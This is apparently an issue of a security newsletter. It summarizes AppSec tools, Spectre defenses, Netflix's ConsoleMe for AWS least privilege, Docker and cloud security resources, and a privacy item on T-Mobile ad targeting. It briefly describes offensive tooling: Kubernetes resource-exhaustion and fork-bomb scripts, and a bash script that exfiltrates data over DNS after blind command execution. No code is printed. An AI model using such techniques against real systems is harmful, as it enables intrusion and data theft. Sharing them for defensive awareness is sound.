[tl;dr sec] #75 - IAM Least Privilege at Speed, Spectre, and How to Beat a Grandmaster at Chess
How Netflix enables development velocity + security with ConsoleMe, Spectre PoC and proposed defenses, and why speed is a superpower.
I hope you’ve been doing well!
DevSecCon announced the winners:
A big congrats to all these great people doing great work, keep it up! 🙌
With (Mediocre) Power Comes…
One fun thing about tl;dr sec is that periodically people share neat articles with me that I wouldn’t have otherwise seen, or share tools that haven’t been publicly released yet.
Like endgame, if you saw that kerfuffle. And there’s another tool in the works that I think will also cause a bit of splash. Keep an eye out 😎
Another thing I realized, is that tl;dr sec in the wrong hands could be used to spoil the twist in some movie or TV show for a pretty decent number of people.
I’m not the type to do that, but it was a random shower thought I had.
📢 Use SpiderFoot HX for broader attack surface visibility
An attack surface is made up of more than open ports and hostnames; you need a full spectrum of OSINT. If you already know this, then you've probably hit the next hurdle: automating collection and correlation of all that data. That's where SpiderFoot HX comes in. Built on top of the popular open source version, it automates your OSINT collection and gives you the tools to find the critical needle in the stack of needles. It's also cloud-hosted, so always online and ready to go. As a tl;dr sec subscriber, you'll receive a 10% discount on any annual subscription by using the coupon TLDRSEC.
One of the cool things about SpiderFoot is that it started as (and still is) an open source project by Steve Micallef and team. I’m a fan of open source projects with a commercial version with enterprise-y features.
That way, businesses can get their problems solved, the open source version can be actively supported, and the maintainers can earn a good living. Check it out!
📜 In this newsletter...
AppSec: GitHub App to up your PR approval policy game, overview of a lightweight threat modeling approach
Web Security: Middleware misconfigurations and potential exploits
Spectre: Spectre demo in your browser, RFC on protecting against it, Chrome extension to find potentially vulnerable resources
Cloud Security: Tool to balance IAM least privilege + development velocity, manage GCP secrets in your IDE, hackingthe.cloud, when to use Amazon Cognito
Container Security: OWASP Docker security cheat sheet, PoC scripts to demonstrate Kubernetes DoS conditions
Red Team: Bash script that automated data exfiltration over DNS
Politics / Privacy: T-Mobile is selling your data by default now. Shame!
Beating a grandmaster at chess: Moving quickly is a superpower
A GitHub App for enforcing approval policies on pull requests that goes beyond what GitHub natively supports, including:
Require reviews from specific users, organizations, or teams
Apply rules based on the files, authors, or branches involved in a pull request
Combine multiple approval rules with and and or conditions
Automatically approve pull requests that meet specific conditions
Rapid Risk Assessments (RRA): a lightweight approach to measuring risks and modeling threats
~30min video by Julien Vehent in which he describes rapid risk assessments, a lightweight threat modeling approach that I think is quite practical and useful. (Mozilla docs).
Middleware, middleware everywhere and lots of misconfigurations to fix
Detectify’s Frans Rosén, Mathias Karlsson, and Fredrik Almroth describe some interesting middleware misconfigurations and potential exploits that, if left unchecked, leaves your web applications vulnerable to attack. See also, common Nginx misconfigurations.
🔥 Spectre Demo
Post-Spectre Web Development
W3C RFC by Google’s Mike West et al that does a nice job of laying out the threat model and concrete mitigations in different scenarios. Sidenote: if you’re interested in modern web and browser security features, this RFC references a number of useful topics and resources.
Chrome extension by Lukas Weichselbaum et al that “identifies resources which are exempt from default protections enabled in Google Chrome (Cross-Origin Read Blocking, SameSite cookies) and which can be embedded cross-site. The results are added to Chrome’s DevTools “Spectroscope” panel and include security recommendations to help protect your resources from Spectre and other cross-site attacks.”
Introducing Cloud Code Secret Manager Integration
You can now create and manage secrets stored in GCP’s Secret Manager right from your IDE (VS Code, IntelliJ, Cloud Shell Editor). Wow, this is some A+ developer UX work, well done.
“An encyclopedia of attacks/tactics/techniques that offensive security professionals can use on their next cloud exploitation adventure,” by Nick Frichette. Currently covers general knowledge, enumeration, exploitation, avoiding detection, and post exploitation for AWS.
Pros: Very cost effective and plays nicely with AWS services.
Cons: Poorly documented and some of its features feel undercooked.
🔥 ConsoleMe: A Central Control Plane for AWS Permissions and Access
This is like the security engineering equivalent of a fancy schmancy wine you’d swirl around in your glass to make sure its properly aerated before enjoying (“Mmm, hints of least privilege with notes of cloud-native.”).
Super cool work by the Netflix cloud security team, including Curtis Castrapel, Patrick Sanders, and Hee Won Kim, on how Netflix balances IAM least privilege with development velocity. Snape kills Dumbledore. Travis McPeak and Will Bengston discussed ConsoleMe in their AppSec Cali 2019 talk (summary), and what I love about it is it improves security and developer productivity.
Highly recommended reading as inspiration for your internal security engineering efforts.
OWASP Cheat Sheet Series: Docker Security
11 rules to follow, a list of static analysis tools, and a number of useful reference articles.
uchi-mata/dostainerBy Matthias Luft: Three scripts to demonstrate resource exhaustion from within a Kubernetes cluster, including allocating all remaining RAM, allocating all remaining disk space, and fork bombing.
By @_vepe: A bash script that automates the exfiltration of data over DNS. Useful when you have a blind command execution on a server where all outbound connections except DNS are blocked.
Politics / Privacy
T-Mobile to Step Up Ad Targeting of Cellphone Customers
So frustrating 🤬 “T-Mobile will automatically enroll its phone subscribers in an advertising program informed by their online activity, testing businesses’ appetite for information that other companies have restricted.” Thankfully Drew FitzGerald with some opt-out info. H/T Zack Whittaker.
From ConvertKit founder Nathan Barry’s newsletter:
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!